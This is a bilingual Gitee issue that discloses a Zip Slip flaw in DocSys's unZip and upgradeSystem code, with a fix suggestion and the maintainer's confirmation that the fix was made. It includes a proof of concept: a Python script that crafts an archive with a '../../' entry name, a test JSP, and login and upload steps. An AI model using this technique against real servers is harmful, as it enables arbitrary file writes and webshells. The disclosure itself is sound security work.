568 Star 2.3K Fork 832

Rainy / DocSys

 / 详情

【缺陷】Zip Slip vulnerability

已完成
创建于  
2022-12-09 16:57

Instructions in English

Description

There is a Zip Slip vulnerability in the MxsDoc(DocSys) application that can cause malicious jsp files to be uploaded. The vulnerability is located in the BaseController.java file, where the unZip method did not Check "... /". This vulnerability can also be triggered by the upgradeSystem method of the ManageController.java file. Writes a malicious jsp file to the web directory.

Impact

  1. Affected version: less than or equal to DocSys_V2.02.37(latest version)
  2. Condition of utilization:The administrator or super administrator rights are required
  3. Impact:A zip slip vulnerability in this system can result in getshell

Code Audit

In com.DocSystem.Controller.BaseController#unZip method exists in the following code snippet:
输入图片说明

The value of entry.getName() is controllable. Inject ".. /", you can write the malicious jsp file to the web root.

Looking for a trigger point, found in com.DocSystem.Controller.ManageController#upgradeSystem method triggers the com.DocSystem.Controller.BaseController#unZip method.
The key code is as follows:
输入图片说明

Steps to reproduce

Application Installation

This system is available on both github and gitee, but there is a war package on github for easy deployment. The download address is as follows: https://github.com/RainyGao-GitHub/DocSys/releases
输入图片说明

After downloading DocSystem.war, unzip it, store it in the tomcat webapps directory, and modify the database configuration file jdbc.properties:

db.type=mysql
db.driver=com.mysql.cj.jdbc.Driver
db.url=jdbc:mysql://localhost:3306/DocSystem1?useUnicode=true&characterEncoding=UTF-8&serverTimezone=UTC
db.username=root
db.password=root

After the success of the start tomcat, visit http://localhost:8080/DocSystem/web/index.html
During application initialization, you need to create a system administrator: admin/admin123

Create malicious compressed files

tgao.jsp file contents:

<html>
<body>
	<%
        out.println("zip slip getshell.");
    %>
</body>
</html>

Write a python script to compress the jsp file contents into DocSystem.war and specify the name as ../../DocSystem/tgao.jsp, which corresponds to entry.getName() in the source code.

import zipfile

if __name__ == "__main__":
    try:
        zipFile = zipfile.ZipFile("DocSystem.war", "a", zipfile.ZIP_DEFLATED)  ##生成的zip文件
        info = zipfile.ZipInfo("DocSystem.war")
        zipFile.write("D:/tgao/pass/tgao.jsp", "../../DocSystem/tgao.jsp", zipfile.ZIP_DEFLATED)  ##压缩的文件和在zip中显示的文件名
        zipFile.close()
    except IOError as e:
        raise e

Run the python script to generate the DocSystem.war file

Exploitation of vulnerabilities

After using the admin/admin123 login system,go to http://localhost:8080/DocSystem/manager/main.html
输入图片说明
Click the Upgrade button and upload the malicious compressed file DocSystem.war
输入图片说明
Click the Confirm button,Visit: http://localhost:8080/DocSystem/tgao.jsp
输入图片说明
The tgao.jsp file was successfully written.

Bug Repair Suggestions

Check whether the contents returned by entry.getName() exist "../" and intercept

中文说明

漏洞描述

MxsDoc(DocSys)中存在一个Zip Slip漏洞,可导致上传恶意jsp文件。漏洞位于BaseController.java文件,其中unZip方法解压文件时未对../ 进行检测,导致Zip Slip漏洞存在,另外可通过ManageController.java文件的upgradeSystem方法触发此漏洞。可导致像web目录写入恶意jsp文件。

漏洞影响

影响版本:小于等于DocSys_V2.02.37(最新版本)
利用条件:需要管理员权限登录
危害:此系统的zip slip可导致getshell

漏洞发现

在com.DocSystem.controller.BaseController#unZip方法中存在如下代码片段
输入图片说明
其中entry.getName()的值是可控的,通过../可以将恶意jsp文件写到web根目录。
寻找触发点,发现在com.DocSystem.controller.ManageController#upgradeSystem方法中触发了com.DocSystem.controller.BaseController#unZip方法
关键代码如下:
输入图片说明

漏洞复现

制作恶意压缩包

tgao.jsp文件内容:

<html>
<body>
	<%
        out.println("zip slip getshell.");
    %>
</body>
</html>

编写python脚本将jsp文件内容内容压缩至DocSystem.war中,并指定name为../../DocSystem/tgao.jsp,此值对应源码中的entry.getName()内容

import zipfile

if __name__ == "__main__":
    try:
        zipFile = zipfile.ZipFile("DocSystem.war", "a", zipfile.ZIP_DEFLATED)  ##生成的zip文件
        info = zipfile.ZipInfo("DocSystem.war")
        zipFile.write("D:/tgao/pass/tgao.jsp", "../../DocSystem/tgao.jsp", zipfile.ZIP_DEFLATED)  ##压缩的文件和在zip中显示的文件名
        zipFile.close()
    except IOError as e:
        raise e

运行之后生成DocSystem.war文件

漏洞利用

利用zip slip漏洞可以向服务器中任何有写权限的目录写任何文件,若文件存在将会直接覆盖,这里为了有直接的效果,演示向web目录写入jsp文件,具体如下:
使用admin/admin123登录系统后访问:
http://localhost:8080/DocSystem/manager/main.html
输入图片说明
点击系统升级,上传制作完成的恶意压缩文件DocSystem.war
输入图片说明
点击确认即可.
访问:http://localhost:8080/DocSystem/tgao.jsp
输入图片说明
tgao.jsp成功被写入。

修复建议

检查entry.getName()是否存在../并拦截

评论 (2)

TGAO 创建了任务
Rainy 任务状态从 待办的 修改为已取消
Rainy 任务状态从 已取消 修改为待办的
Rainy 修改了描述
Rainy 修改了标题
展开全部操作日志

下个版本会增加zip文件名的相对路径检查,避免利用相对路径注入文件

Rainy 任务状态从 待办的 修改为已完成
Rainy 任务状态从 已完成 修改为进行中
TGAO 修改了描述

relative path check was added to avoid the illegal inject the file from during unzip

Rainy 任务状态从 进行中 修改为已完成

登录 后才可以发表评论

状态
负责人
里程碑
Pull Requests
关联的 Pull Requests 被合并后可能会关闭此 issue
分支
开始日期   -   截止日期
-
置顶选项
优先级
参与者(2)
7554608 h3110n3w0r11d 1670478742
Java
1
https://gitee.com/RainyGao/DocSys.git
git@gitee.com:RainyGao/DocSys.git
RainyGao
DocSys
DocSys

搜索帮助